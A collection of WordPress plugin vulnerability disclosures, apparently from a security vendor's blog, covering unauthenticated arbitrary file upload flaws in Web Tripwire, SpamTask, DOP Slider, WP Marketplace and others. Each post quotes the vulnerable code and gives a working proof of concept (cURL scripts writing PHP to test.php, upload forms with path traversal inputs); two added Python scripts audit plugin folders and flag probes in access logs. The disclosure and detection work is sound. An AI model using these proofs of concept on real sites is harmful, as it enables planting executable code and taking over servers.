13 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in Web Tripwire

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor hacking attempts on our websites. Through that we recently came across a request for a file, /web-tripwire/js/swfobject.js, from the plugin Web Tripwire. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin, we found that it bundles a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /includes/ofc/ofc_upload_image.php in this plugin. The file takes the raw POST data of a request and saves it to a file whose name is specified by the GET input “name”:

$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code into the file test.php in the directory /wp-content/plugins/web-tripwire/includes/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/web-tripwire/includes/ofc/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
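As an added example (not code from this post or from any of the plugins it covers), the following Python script audits a wp-content/plugins tree for bundled copies of the Open Flash Charts handler described above, reporting whether the unguarded raw-POST write is still present and whether the handler's ../tmp-upload-images/ directory already exists; it applies to every plugin that ships the handler, not just Web Tripwire. The plugin layouts, handler bodies and the "disabled" stand-in are constructed fixtures.

```python
import os
import re
import tempfile

# Constructed copy of the unpatched handler quoted above (only the relevant lines).
VULNERABLE_HANDLER = """<?php
$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
$destination = $default_path . basename( $_GET[ 'name' ] );
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);
"""

# Constructed stand-in for a handler an operator has neutered (assumption: the
# body was replaced with an early exit); the audit must not flag it.
DISABLED_HANDLER = "<?php\nhttp_response_code(403);\nexit('upload disabled');\n"

# Signature of the unfixed OFC handler: file name from $_GET['name'],
# file contents from the raw POST body.
NAME_FROM_GET = re.compile(r"basename\(\s*\$_GET\[\s*['\"]name['\"]\s*\]\s*\)")
RAW_POST_WRITE = re.compile(r"fwrite\(\s*\$\w+\s*,\s*\$HTTP_RAW_POST_DATA\s*\)")


def audit_plugins_dir(plugins_dir):
    """Walk a wp-content/plugins tree and report every ofc_upload_image.php.
    Each finding records whether the unguarded write is still present and
    whether the handler's ../tmp-upload-images/ dump directory exists, which
    on an unfixed copy means the endpoint has already been used."""
    findings = []
    for root, _dirs, files in os.walk(plugins_dir):
        if "ofc_upload_image.php" not in files:
            continue
        path = os.path.join(root, "ofc_upload_image.php")
        with open(path, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        dump_dir = os.path.normpath(os.path.join(root, "..", "tmp-upload-images"))
        rel = os.path.relpath(path, plugins_dir).replace(os.sep, "/")
        findings.append({
            "plugin": rel.split("/")[0],
            "handler": rel,
            "vulnerable": bool(NAME_FROM_GET.search(src) and RAW_POST_WRITE.search(src)),
            "dump_dir_exists": os.path.isdir(dump_dir),
        })
    return sorted(findings, key=lambda f: f["handler"])


def build_fixture():
    """Create a throwaway plugins tree mirroring two layouts from these posts,
    web-tripwire/includes/ofc/ and chikuncount/php-ofc-library/ (constructed)."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    layouts = {
        "web-tripwire/includes/ofc": VULNERABLE_HANDLER,
        "chikuncount/php-ofc-library": DISABLED_HANDLER,
    }
    for sub, body in layouts.items():
        d = os.path.join(base, sub)
        os.makedirs(d)
        with open(os.path.join(d, "ofc_upload_image.php"), "w") as fh:
            fh.write(body)
    # Simulate a prior upload: the dump dir exists beside the web-tripwire handler.
    os.makedirs(os.path.join(base, "web-tripwire/includes/tmp-upload-images"))
    return base


if __name__ == "__main__":
    for finding in audit_plugins_dir(build_fixture()):
        print(finding)
```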
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in SpamTask

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/spamtask/jquery.js, from the plugin SpamTask. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin, we found that it bundles a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /chart/php-ofc-library/ofc_upload_image.php in this plugin. The file takes the raw POST data of a request and saves it to a file whose name is specified by the GET input “name”:

$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code into the file test.php in the directory /wp-content/plugins/spamtask/chart/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
06 Feb

Vulnerability Details: Arbitrary File Upload Vulnerability in WP Simple Cart

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/wp-simple-cart/js/json2.js, from the plugin WP Simple Cart. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Since an arbitrary file upload vulnerability is probably the type of vulnerability most likely to be exploited, we started looking over the plugin for that type of vulnerability and immediately found one.

When a request to the file /request/simple-cart-upload.php includes a file, that file is saved with the function move_uploaded_file() to the path held in the variable $uploadfile:

$user_dir = SimpleCartFunctions::TemporaryDir($_GET['prefix']);
 
if (isset($_GET['file'])) {
    $upload_file = explode('.', $_FILES['userfile']['name']);
    $file_name = $_GET['file'] . '.' . $upload_file[count($upload_file)-1];
}
else {
    $file_name = $_FILES['userfile']['name'];
}
 
//file upload
$uploaddir = $user_dir . '/';
$uploadfile = $uploaddir . basename($file_name);
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/wp-simple-cart/files/0/temporary/, if no files have been uploaded through the plugin before.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/wp-simple-cart/request/simple-cart-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="userfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in Seo Spy

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/js/swfobject.js, from the plugin Seo Spy. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin, we found that it bundles a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /ofc/php-ofc-library/ofc_upload_image.php in this plugin. The file takes the raw POST data of a request and saves it to a file whose name is specified by the GET input “name”:

$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code into the file test.php in the directory /wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in PHP Analytics

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/php-analytics/tinymce/phpanalytics.js, from the plugin PHP Analytics. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin, we found that it bundles a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /resources/open-flash-chart/php-ofc-library/ofc_upload_image.php in this plugin. The file takes the raw POST data of a request and saves it to a file whose name is specified by the GET input “name”:

$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code into the file test.php in the directory /wp-content/plugins/php-analytics/resources/open-flash-chart/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in social

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-networking-e-commerce-1/js/effects.js, from the plugin social. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Since an arbitrary file upload vulnerability is probably the type of vulnerability most likely to be exploited, and since other plugins targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and immediately found one.

In numerous files there is code that looks like it will take a file sent with a request and save it to the filesystem. We tested that with the file /classes/views/social-options/form_cat_add.php to confirm the issue. The save happens in the line beginning with move_uploaded_file below; before it, nothing limits who can upload or what can be uploaded, other than the need to provide a POST input “config_path” that indicates where WordPress’ configuration file is (which is usually stored in a standard location):

session_start();
$config_path = $_POST['config_path'];
require_once( $config_path . 'wp-config.php');
$pathinfo=$_POST['pathinfo'];
$pathinfo1=$pathinfo."/wp-admin/admin.php?page=social-category";
 
if((!empty($_FILES["image"])) && ($_FILES['image']['error'] == 0))
{
$filename = basename($_FILES['image']['name']);
$path= dirname(__FILE__);
$path1=explode("classes",$path);
$path2=$path1[0].'images/uploads/';
$newname = $path2.$filename;
move_uploaded_file($_FILES["image"]["tmp_name"],$newname);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/social-networking-e-commerce-1/images/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="config_path" value="../../../../../../" />
<input type="file" name="image" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
26 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in ChikunCounter

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/chikuncount/swfobject.js, from the plugin ChikunCounter. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Looking at the plugin, we found that it bundles a copy of the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was never released to fix the issue.

The vulnerability exists at /php-ofc-library/ofc_upload_image.php in this plugin. The file takes the raw POST data of a request and saves it to a file whose name is specified by the GET input “name”:

$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
 
//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

Proof of Concept

The following proof of concept will place the specified PHP code into the file test.php in the directory /wp-content/plugins/chikuncount/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/chikuncount/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>
26 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in Developer Tools

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/developer-tools/js/developer-tools.js, from the plugin Developer Tools. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Since an arbitrary file upload vulnerability is probably the type of vulnerability most likely to be exploited, and since other plugins targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and immediately found one.

In the file /libs/swfupload/upload.php there is code that runs once several conditions are met and saves a file sent with the request to the filesystem:

if ( $upload_email_reporting == true AND $upload_directory_writable == true ) {
	if ( move_uploaded_file( $_FILES['Filedata']['tmp_name'] , $uploadfile ) ) {
	 //send_mail("SWFUpload File Saved: ".$_FILES["Filedata"]["name"],'Save Path: '.$uploadfile."\n\n".'$_FILES data: '."\n".print_r($_FILES,true)); 
	}else{
	 send_mail("SWFUpload File Not Saved: ".$_FILES["Filedata"]["name"],'Save Path: '.$uploadfile."\n\n".'$_FILES data: '."\n".print_r($_FILES,true)); 
	}
}

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/developer-tools/libs/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/developer-tools/libs/swfupload/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="UPLOADDIR" value="../" />
<input type="hidden" name="ADMINEMAIL" value="test@example.com" />
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
25 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in DOP Slider

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/dop-slider/libraries/js/jquery.uploadify.min.js, from the plugin DOP Slider. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

The name of the requested file seemed to refer to Uploadify, a library that was associated with a number of arbitrary file upload vulnerabilities in plugins several years ago, because software using it did not properly restrict uploads. When we searched for existing reports of a vulnerability of that type in DOP Slider, or of some other vulnerability, all we came up with was a page listing plugin files apparently related to Uploadify.

Looking at the code in the file listed for this plugin, /libraries/php/uploadify.php, the issue can be seen:

if (!empty($_FILES)){
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_GET['path'].'uploads';
 
    $ext = substr($_FILES['Filedata']['name'], strrpos($_FILES['Filedata']['name'], '.') + 1);
 
    $len = 64;
    $base='ABCDEFGHKLMNOPQRSTWXYZabcdefghjkmnpqrstwxyz123456789';
    $max=strlen($base)-1;
    $newName='';
    mt_srand((double)microtime()*1000000);
    while (strlen($newName)<$len+1){
        $newName.=$base{mt_rand(0,$max)};
    }
 
    $targetFile =  str_replace('//','/',$targetPath).'/'.$newName.'.'.$ext;
    move_uploaded_file($tempFile, $targetFile);

If a file has been included with a request to that file, the code generates a random file name and places the uploaded file in a directory made up of whatever value is supplied in the GET input “path” followed by the word “uploads”.

At the bottom of the file’s code the generated name of the saved file is echoed:

echo $newName.'.'.$ext;

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/dop-slider/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/dop-slider/libraries/php/uploadify.php?path=../../" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
14 Oct

Arbitrary File Upload Vulnerability in WP Marketplace

When it comes to certain types of plugins you would hope that developers would be extra careful about security, eCommerce plugins being one of them for obvious reasons, but we have continued to see poor security practices with that type of plugin. Among the vulnerabilities we have found in them this year have been two arbitrary file upload vulnerabilities, which is probably the type of vulnerability most likely to be exploited. As part of our monitoring of hacker activity we have just spotted another one, and this time it is one that is likely already being exploited.

Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually an indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor.

Since arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case we quickly found one.

In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is hooked in whenever an admin page is being loaded (the function is_admin() tells you that an admin page is being loaded, not that the user is an Administrator):

if(is_admin())  {
    /*wp_enqueue_script('swfobject',plugins_url().'/wpmarketplace/uploadify/swfobject.js');
    wp_enqueue_script('uploadify',plugins_url().'/wpmarketplace/uploadify/jquery.uploadify.v2.1.4.min.js');
    wp_enqueue_style('uploadify',plugins_url().'/wpmarketplace/uploadify/uploadify.css');*/
 
    add_action("init","wpmp_upload_previews");
    add_action("wp_ajax_wpmp_delete_preview","wpmp_delete_preview");
    add_filter("wpmp_meta_box","wpmp_meta_box_images");
}

The function wpmp_upload_previews() will then save an uploaded file to the filesystem without checking who is making the request, leading to an arbitrary file upload vulnerability:

function wpmp_upload_previews(){
     $adpdir = WPMP_IMAGE_DIR;
     if((isset($_GET['task'],$_FILES['Filedata']['tmp_name']) && is_uploaded_file($_FILES['Filedata']['tmp_name'])   && $_GET['task']=='wpmp_upload_previews')){
        $tempFile = $_FILES['Filedata']['tmp_name'];    
        $targetFile =  $adpdir ."wpdm-adp-". time().'-'.wpmp_format_name($_FILES['Filedata']['name']);
        move_uploaded_file($tempFile, $targetFile);
        echo basename($targetFile);        
        die();
     }
 
}

Development of the plugin stopped some time ago, so we are disclosing the vulnerability and notifying the Plugin Directory.

On the plugin’s page on wordpress.org, it is mentioned at the top that the developers of this plugin are also the developers of the WordPress Download Manager plugin, for which we discovered an authenticated arbitrary file upload vulnerability nearly four months ago that still hasn’t been fixed. So security doesn’t seem to be a priority for them in general.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/wpmp-previews/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php?task=wpmp_upload_previews" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/14/2016 – WordPress.org Plugin Directory notified.
  • 10/14/2016 – Plugin removed from WordPress.org Plugin Directory.
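Each of the posts above began with a request for one of the plugins' static files, and each describes an upload handler that accepts unauthenticated POSTs. As an added example (not the blog's own tooling), the following Python detection logic classifies web-server access log lines into fingerprinting probes for the files named in these posts and upload attempts against the handlers they describe; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Static files whose requests the posts above reported as fingerprinting probes.
PROBE_PATHS = {
    "/wp-content/plugins/web-tripwire/js/swfobject.js": "Web Tripwire",
    "/wp-content/plugins/spamtask/jquery.js": "SpamTask",
    "/wp-content/plugins/wp-simple-cart/js/json2.js": "WP Simple Cart",
    "/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/js/swfobject.js": "Seo Spy",
    "/wp-content/plugins/php-analytics/tinymce/phpanalytics.js": "PHP Analytics",
    "/wp-content/plugins/social-networking-e-commerce-1/js/effects.js": "social",
    "/wp-content/plugins/chikuncount/swfobject.js": "ChikunCounter",
    "/wp-content/plugins/developer-tools/js/developer-tools.js": "Developer Tools",
    "/wp-content/plugins/dop-slider/libraries/js/jquery.uploadify.min.js": "DOP Slider",
    "/wp-content/plugins/wpmarketplace/css/extends_page.css": "WP Marketplace",
}

# Upload handlers the posts describe, matched on the tail of the request path.
UPLOAD_HANDLERS = ("ofc_upload_image.php", "uploadify.php", "simple-cart-upload.php",
                   "form_cat_add.php", "swfupload/upload.php")

# Combined-log-format prefix: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')


def classify(line):
    """Return (kind, what, detail) for one access-log line, or None when the line
    is unparseable or unrelated. kind is 'probe' or 'upload_attempt'."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, query, ip = url.path, parse_qs(url.query), m.group("ip")
    if path in PROBE_PATHS:
        return ("probe", PROBE_PATHS[path], ip)
    if m.group("method") != "POST":
        return None
    # WP Marketplace: the post's PoC sends task=wpmp_upload_previews to admin-post.php.
    if path.endswith("/admin-post.php") and query.get("task") == ["wpmp_upload_previews"]:
        return ("upload_attempt", "wpmp_upload_previews", ip)
    for handler in UPLOAD_HANDLERS:
        if path.endswith(handler):
            detail = ip
            # OFC: the GET 'name' becomes the saved file name; a .php name is the tell.
            name = query.get("name", [""])[0]
            if handler == "ofc_upload_image.php" and name.lower().endswith(".php"):
                detail += " name=" + name
            return ("upload_attempt", handler, detail)
    return None


def scan(lines):
    """Run classify over an iterable of log lines and keep the hits, in order."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2017:10:00:01 +0000] "GET /wp-content/plugins/web-tripwire/js/swfobject.js HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2017:10:00:02 +0000] "POST /wp-content/plugins/web-tripwire/includes/ofc/ofc_upload_image.php?name=test.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2017:10:05:00 +0000] "POST /wp-content/plugins/dop-slider/libraries/php/uploadify.php?path=../../ HTTP/1.1" 200 69 "-" "curl/7.47.0"',
    '198.51.100.7 - - [01/Jan/2017:10:06:00 +0000] "POST /wp-admin/admin-post.php?task=wpmp_upload_previews HTTP/1.1" 200 40 "-" "curl/7.47.0"',
    '192.0.2.9 - - [01/Jan/2017:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```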